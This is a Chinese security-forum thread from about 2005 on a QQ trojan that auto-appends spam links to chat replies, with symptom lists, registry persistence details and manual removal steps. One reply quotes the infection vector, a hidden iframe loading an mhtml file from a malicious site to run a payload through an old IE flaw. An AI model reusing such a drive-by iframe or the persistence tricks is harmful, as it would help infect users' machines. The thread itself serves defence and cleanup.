|
 | 作者: CyberSpy [cyberspy]
 论坛用户 |
登录 |
| 关于“qq自动回复加上小尾巴!!” 近来众多网友反映qq回复时自动被加上了一些小尾巴,甚是烦人。究其原因:网页恶意代码。一些网站为了达到宣传自己、盗取qq等密码等等的可恶目的,太阴毒了!真心希望他们的无耻行为受到法律的制裁!(我没有做梦吧~) 对于http://www.QQ168.net,由于我是ie6.0,所以没有能中招(本想以身试毒,看看个究竟的,但是天妒英才,哎 ~#¥#¥~),因此本文中的情况皆为根据以往经验虚拟出来的,也许会跟您的遭遇有很多出入,但是原理相通,希望能抛砖引玉,大家最后“高高兴兴上20cn来,快快乐乐杀毒去”。另幸好本版先前“马大哈”同志给出了一帖那个恶意网站的一部分vb脚本源代码对于ie恶意修改还是有所了解。 大概病毒行为: (1)初始状况会在%windir%\system32\或者%\system\目录下生成一些乱七遭八的木马文件!从几个朋友寄给我的截图来看,没有发现共同的木马文件,只有这个项目绝对可疑:run里面intrenet,在c:\windows\system\intrenet.exe(注意这里故意伪造得像internet,不至于引起人们注意,这是坏蛋的常用手法哦).可能是exe、dll为文件后缀。应该是偷qq密码的,已经中招的,请一定注意自己的qq密码哦,最好马上修改得复杂点,不要再在本机上上qq了。 (2)修改注册表,增加开机启动项目,使木马服务器端一开机就运行 在注册表中添加HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\等以run开头的项目中,内容为:%windir%\system32\具体文件这里说不准! 可能修改exe文件、txt文件和com文件等的默认打开方式(即文件关联,你一运行exe文件、txt文件或者com文件木马就被执行一次):将HKEY_CLASSES_ROOT\comfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\txtfile\shell\open\command的内容修改为了%windir%\System32\具体文件这里说不准 %1 %*。将HKEY_CLASSES_ROOT\exefile\shell\open\command的内容修改为%windir%\System32\具体文件这里说不准 %1 %*。 (3)恶意修改ie的一些选项,具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。 手工清除方法: 1、运行注册表编辑器(regedit)。 2、用系统自带的任务管理器或者进程管理软件停掉可疑的进程。这里是c:\windows\system\intrenet.exe 3、修改HKEY_CLASSES_ROOT\comfile\shell\open\command和HKEY_CLASSES_ROOT\exefile\shell\open\command为"%1" %*,删掉HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等run开头的项,右边可疑项目。或者运行msconfig->启动->去掉可疑项目。 4、删掉%windir%\system32\中上面发现的可疑文件,这里是c:\windows\system\intrenet.exe 。 如果您是新手,对自己的行为不是很有信心,清除过程中可以利用一下:超级兔子魔法设置或者windows优化大师等系统工具。 另外:推荐使用http://www.20cn.org/download/Defend/navce8chs.rar 诺顿杀毒软件,可以在线升级病毒库。 请升级ie或者到微软下载补丁 具体大概QQ情缘音乐世界,http://www.QQ168.net这个可恶的小尾巴中:这里是c:\windows\system\intrenet.exe应该是木马文件了; c:\windows\system\systel.dll、c:\windows\system.dll (注意路径和文件名)这两个为恶意vbs脚本文件,不是系统动态链接库。他们修改通过恶意修改注册表达到系统启动便自行修改ie项目的目的,可以删除掉。具体的情况请参照本版置顶帖“恶意代码全攻略终结篇”。其他的,木马文件在哪里是什么我不清楚,十分十分抱歉! PS:感谢几个朋友的发过来的截图,谢谢! [此贴被 CyberSpy(cyberspy) 在 05月05日19时20分 编辑过] |
| 地主 发表时间: 05/05 18:59 |
| 回复: CyberSpy [cyberspy] 论坛用户 |
登录 |
|
主要症状: 1.nt和2000下该木马会试图把自己注册为服务; 2.设置默认主页为 http://www.qq3344.com; 3.生成文件: intrenet.exe, windows.exe ; 4.试图在注册表里添加键值:hkey_current_user\software\microsoft\windows nt\currentversion\windows\load = %systemboot%\system\windows.exe hkey_local_machine\software\microsoft\windows\currentversion\run\intrenet = %systemboot%\system\intrenet.exe,同时会定时对注册表进行修改,防止用户改正。 5.获取当前工作窗口,向发送消息的窗口填入:"朋友,你快去 http://www.qq3344.com 听超爽流行音乐摇滚dj免费电影!千万不要错过!我天天都上这个网!";并发送出去,骗取其他网友点击,实现快速传播 6.如果访问 http://www.qq3344.com, 首页文件中有如下代码:<iframe height=0 src="mhtml: http://www.qq3344.com/qq3344/qq3344.mht" width=0></iframe>;它会让计算机自动下载并打开qq3344.mht文件, 这个文件利用了iframe漏洞,会自动运行其中的附件, 这个附件就是本文介绍的这个病毒。 解决:非法篡改IE默认主页,和在QQ里无故发给别人一条<朋友,你快去http://www.QQ3344.com 听超爽流行音乐摇滚DJ免费电影!千万不要错过!我天天都上这个网!>或是诸如此类字样的文章,点击链接后,进入此网站,结果在电光石火之间,你会看到你的IE自动下载了什么东西,然后你的烦恼就开始了,每次打开IE窗口,就会进入这个无耻加败类加三级加死人妖的下九流网站,和朋友开QQ聊天时,也不时会自动给你加上网站地址发过去,极其讨厌! 首先,请大家和我一起骂:www.qq3344.net,或是www.qq168.net,?..个儿子没P眼。。 第二步,下载超级魔法兔子 第三步:请打开IE,在工具――Internet选项――常规里,把默认主页改为空白页。这一步很重要!不然你完全修复之后再打开IE,结果。。哼哼,后果自负。 第四步,在开始。。查找。。里查找以下文件:qq3344.exe start.exe windows.vbs windows.exe intrenet.exe如果没有这个就找intreneter.exe 找到就删之,也许有一两个文件说系统正在使用,无法删除,那就用要用到魔法兔子了。。 第五步,打开魔法兔子。。进。。。超级兔子软件优化,这时也许会出现让你注册的信息,取消即可,就进入魔法设置的界面,。。再点自动运行。。在自动运行里会有一个叫interneter的东西,选中,把前面的勾去掉,然后删除,再点进程管理,找一找,有一个qq3344的东西,选中,终止进程,然后再在开始。。查找里再找一找qq3344.exe,(或是qq168.exe)和interneter.exe,如果找到,删之。。。。 重启电脑. |
| B1层 发表时间: 05/09 12:24 |
 | 回复: ma2751_cn [ma2751_cn]  |
登录 |
|
����~~~请大家帮忙发点类似的URL来,我道想得到它的源代码来研究~~~ |
| B2层 发表时间: 05/09 19:15 |
 | 回复: magician50 [magician50]  论坛用户 |
登录 |
|
太慢了,已经重装了:( 那时只删了intrenet.exe文件,不过删了后第二次又会自动生成! 不知道这个新方法有没有用! |
| B3层 发表时间: 05/15 21:21 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 关于“qq自动回复加上小尾巴!!”解决办法第一次修改版